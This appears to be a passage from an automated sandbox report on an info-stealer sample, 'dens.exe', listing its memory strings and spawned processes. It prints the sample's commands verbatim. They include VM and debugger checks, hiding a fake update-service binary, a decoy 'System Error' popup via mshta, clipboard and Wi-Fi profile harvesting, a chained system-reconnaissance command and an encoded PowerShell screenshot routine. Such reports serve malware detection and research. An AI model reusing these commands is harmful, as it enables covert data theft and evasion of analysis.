            Source: tasklist.exe, 0000001D.00000002.1765374241.0000022FF79E0000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 0000001D.00000003.1764322605.0000022FF79DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processystem32;DD
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: tasklist.exe, 0000000A.00000003.1723020899.0000018791CDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_ProcessH;.MSCP
            Source: dens.exe, dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: dens.exe, 00000001.00000003.1775186095.000002D9AC3BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: dens.exe, 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
            Source: tasklist.exe, 0000000A.00000003.1723345504.0000018791CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_ProcessH;.MSCP66
            Source: dens.exeReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\dens.exeFile read: C:\Users\user\Desktop\dens.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\dens.exe "C:\Users\user\Desktop\dens.exe"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Users\user\Desktop\dens.exe "C:\Users\user\Desktop\dens.exe"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Users\user\Desktop\dens.exe "C:\Users\user\Desktop\dens.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe""Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
